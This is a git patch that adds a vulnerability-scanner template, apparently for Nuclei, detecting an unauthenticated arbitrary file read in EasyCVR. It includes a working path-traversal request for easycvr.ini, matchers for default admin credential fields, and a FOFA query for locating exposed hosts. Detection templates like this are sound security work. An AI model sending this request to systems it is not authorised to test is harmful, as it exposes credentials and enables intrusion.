From 3f2816639d34671fb92142919437c633cce98ec5 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 16 Dec 2024 14:36:29 +0300 Subject: [PATCH 1/2] add easycvr-arbitrary-file-read --- .../other/easycvr-arbitrary-file-read.yaml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml new file mode 100644 index 00000000000..244102b5f4c --- /dev/null +++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml @@ -0,0 +1,46 @@ +id: easycvr-arbitrary-file-read + +info: + name: EasyCVR Video Management - Arbitrary File Read + author: s4e-io + severity: high + description: | + The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state. + remediation: | + Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files. + reference: + - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086 + metadata: + verified: true + max-request: 2 + fofa-query: icon_hash="458134656" + tags: easycvr,unauth,misconfig,arbitrary-file-read + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "EasyCVR")' + - "status_code == 200" + condition: and + internal: true + + - raw: + - | + GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "default_admin_user", "default_admin_password")' + - 'contains(content_type, "text/plain")' + - "status_code == 200" + condition: and From f4af46f3d5c4642f1cd5cf42782f739720df587e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 17 Dec 2024 10:41:19 +0530 Subject: [PATCH 2/2] Update easycvr-arbitrary-file-read.yaml --- http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml index 244102b5f4c..934b55491d5 100644 --- a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml +++ b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 fofa-query: icon_hash="458134656" - tags: easycvr,unauth,misconfig,arbitrary-file-read + tags: easycvr,unauth,lfi flow: http(1) && http(2)